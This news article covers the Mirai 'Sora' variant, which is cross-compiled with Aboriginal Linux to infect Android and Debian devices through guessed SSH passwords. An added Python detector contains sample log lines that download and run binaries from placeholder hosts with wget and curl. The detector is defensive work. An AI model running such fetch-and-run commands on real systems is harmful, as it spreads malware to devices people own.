Mirai IoT Malware Uses Linux to Attack Multiple Platforms


Major changes are under way in the IoT malware landscape. Security researchers have discovered a version of the Mirai IoT malware that can run on a variety of architectures, even on Android devices.

This Mirai strain is known as Sora and was first discovered earlier in the year.

The earliest version was nothing of note, and Sora's original creators began developing a Mirai Owari version shortly after Sora's creation.

"SORA is now an abandoned project and I will continue to work on OWARI," said Wicked, author of the Sora malware, in an interview with NewSky Security.

The Mirai Sora variant is making a comeback.

The SORA code has been abandoned, but not forgotten. Ankit Anubhav, a malware analyst at NewSky Security, told Bleeping Computer that the number of Sora detections has been steadily increasing since June. See the chart below.

It seems that other malware authors have improved the SORA code themselves. A Symantec report released today details an improved version of Sora.

New Sora version compiled with Aboriginal Linux

What stands out about this new Sora release is that the malware authors compiled it using Aboriginal Linux, a toolchain utility that takes source code and generates binaries for a considerable number of platforms.

The author behind this new strain uses all of these binaries in the infection process in an attempt to spread his Sora variant to as many devices as possible.

Once he gains access to a device by guessing its SSH password, the infection routine downloads and executes a list of Sora binaries one by one until it finds one suitable for the infected device's platform.

This particular variant of Mirai Sora that uses Aboriginal Linux has been around since July. Symantec said they found binaries that were successfully executed on Android and Debian operating systems, platforms that Mirai has never successfully infected before.
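A defender-side view of the try-each-binary routine described above, as an added example that is not from Symantec, NewSky Security or the original article: it flags a login session that downloads and runs several distinct binaries in quick succession. The event tuple format, session ids, hosts and file names are constructed assumptions, not real log formats or indicators.

```python
import re
from collections import defaultdict

# Constructed sample events: (epoch seconds, session id, command line, exit status).
# 203.0.113.5 and the sample.* / tool.bin names are placeholders, not real indicators.
EVENTS = [
    (100, "ssh-41", "wget http://203.0.113.5/sample.mips -O /tmp/a", 0),
    (101, "ssh-41", "chmod +x /tmp/a", 0),
    (102, "ssh-41", "/tmp/a", 126),  # 126: shell could not execute it (e.g. wrong arch)
    (103, "ssh-41", "wget http://203.0.113.5/sample.arm -O /tmp/a", 0),
    (104, "ssh-41", "chmod +x /tmp/a", 0),
    (105, "ssh-41", "/tmp/a", 126),
    (106, "ssh-41", "wget http://203.0.113.5/sample.x86 -O /tmp/a", 0),
    (107, "ssh-41", "chmod +x /tmp/a", 0),
    (108, "ssh-41", "/tmp/a", 0),    # this build matched the platform
    (300, "ssh-77", "curl https://198.51.100.9/tool.bin -o /tmp/tool", 0),
    (302, "ssh-77", "/tmp/tool --version", 0),  # one fetch-and-run: not flagged
]

# Simplification: only matches wget/curl with the URL before the -O/-o output path.
FETCH = re.compile(r"^(?:wget|curl)\s.*?(https?://\S+).*?\s-[oO]\s+(\S+)")

def flag_sessions(events, min_attempts=3, window=60):
    """Return {session: [(url, exit_status), ...]} for sessions that fetched and
    ran at least min_attempts distinct binaries within window seconds."""
    fetched = defaultdict(dict)   # session -> {saved path: source url}
    attempts = defaultdict(list)  # session -> [(ts, url, exit_status)]
    for ts, sess, cmd, status in sorted(events):
        m = FETCH.match(cmd)
        if m:
            fetched[sess][m.group(2)] = m.group(1)
            continue
        prog = (cmd.split() or [""])[0]
        if prog in fetched[sess]:  # a just-downloaded file is being executed
            attempts[sess].append((ts, fetched[sess].pop(prog), status))
    hits = {}
    for sess, runs in attempts.items():
        distinct = {url for _, url, _ in runs}
        if len(distinct) >= min_attempts and runs[-1][0] - runs[0][0] <= window:
            hits[sess] = [(url, status) for _, url, status in runs]
    return hits

if __name__ == "__main__":
    for sess, runs in flag_sessions(EVENTS).items():
        print(sess, runs)
```

The run of failed executions followed by one success is the signal worth alerting on; the thresholds are starting points to tune against normal administrative activity.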

Mirai activity is increasing

Troy Mursch, the US security researcher who runs the Mirai tracker, told Bleeping Computer in a private conversation today that Sora isn't the only one seeing a resurgence, and that the number of Mirai attacks has been steadily increasing.

Incoming traffic matching Mirai-like signatures has been observed from 86,063 unique source IPs so far this year. The peak of the #botnet campaign started in June. @circl_lu Similar observations have been made.
- Bad Packets Report (@bad_packets) August 1, 2018

"Even if devices are rebooted, they become new targets again because potential vulnerabilities are never patched," Mursch said, pointing the blame at outdated devices that lack security patches. Until that changes, Mirai will continue to plague the larger IoT landscape and the Internet as a whole.

